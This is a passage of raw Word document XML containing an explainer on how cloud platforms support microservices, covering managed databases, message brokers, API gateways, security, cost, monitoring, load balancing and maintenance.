          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud providers offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fully managed databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS RDS, Azure SQL Database) that can integrate seamlessly with microservices, freeing you from database management and maintenance tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508E9F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Managed Message Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Amazon SQ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Service Bu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Google Cloud Pub/Sub</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow you to focus on your business logic while the cloud handles message queuing and event-driven communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205476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PI Gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms often include </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>managed API gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like AWS API Gateway) that simplify routing and scaling of API calls to microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9138F9"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Security and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21437A4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Security Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud providers offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>strong security practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> at rest and in transit, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>identity and access management (IAM)</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firewall settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for securing microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6F42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mpliance Certifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Many cloud providers comply with global security standards and certifications (e.g., ISO 27001, GDPR, HIPAA), which helps you ensure that your microservices comply with industry regulations without additional effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C02C8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Cost Efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C799DD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ay-as-you-go Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms typically use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>pay-per-use</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> pricing model, meaning you only pay for the resources you actually use. This helps optimize costs, especially for services with variable workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A86C8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No Upfront Hardware Investment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: The cloud eliminates the need for heavy upfront investments in infrastructure, as you only need to pay for the resources needed for development and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857B4A8"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Global Reach and Latency Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA6D6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ultiple Regions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud providers have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>global network of data centers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> in various regions, allowing you to deploy your microservices closer to your users, thereby improving </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>latenc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ponse time</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76047A4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dge Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Some cloud providers offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>edge computing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> capabilities that enable you to run microservices closer to the user, further reducing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D4294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Simplified Monitoring and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3F30E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Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms provide integrated monitoring solutions (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AWS CloudWatc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Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>) that allow you to track the health, performance, and logs of your microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544C22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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AWS X-Ra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Google Cloud Trace</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable easy </w:t>
      </w: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to monitor and debug microservices, providing insights into how services interact and where issues might arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9F651"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Flexibility in Technology Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB3D3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upport for Multiple Programming Languages</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Cloud platforms allow you to choose from a variety of programming languages, frameworks, and tools that best fit each microservice’s needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8653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ainerization &amp; Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud services support </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>containerized environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS ECS, Google Kubernetes Engine), making it easier to manage and scale microservices with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Dock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Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28508B1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Simplified Service Discovery and Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5829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Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud-native tools help with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making it easier for microservices to find and communicate with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0D23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t-in Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud services often provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>load balancers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS ELB, Azure Load Balancer) to distribute incoming traffic evenly across multiple instances of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE957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Development Collaboration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A933F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eam Collaboration Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms offer integrated tools for team collaboration, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>version control</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., GitHub, GitLab), </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>project management</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Jira, Trello), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>issue tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Azure DevOps, AWS CodeCommit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AC7D1"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ainerized Environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: With services like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Docker</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Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, developers can easily share containerized versions of services, ensuring that environments are consistent across teams and reducing conflicts between development and production setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910955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Simplified Maintenance and Upgrades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3DDA3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ic Patching</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud providers take care of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>patching and upgrading</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> the underlying infrastructure, reducing the burden of system maintenance for development teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8240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Version Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud-native tools allow for easier </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>version management</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and rollback strategies for microservices, ensuring that you can quickly revert to a stable state if an issue arises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BAEA0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4B1AF78"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oud platforms enhance the development, deployment, and maintenance of microservices by providing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high availabil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ecur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cost efficienc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obust tooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. This allows teams to focus on building business logic and delivering features quickly without being bogged down by infrastructure management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169B238" w14:textId="512B76C9" w:rsidR="006C0B8D" w:rsidRPr="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
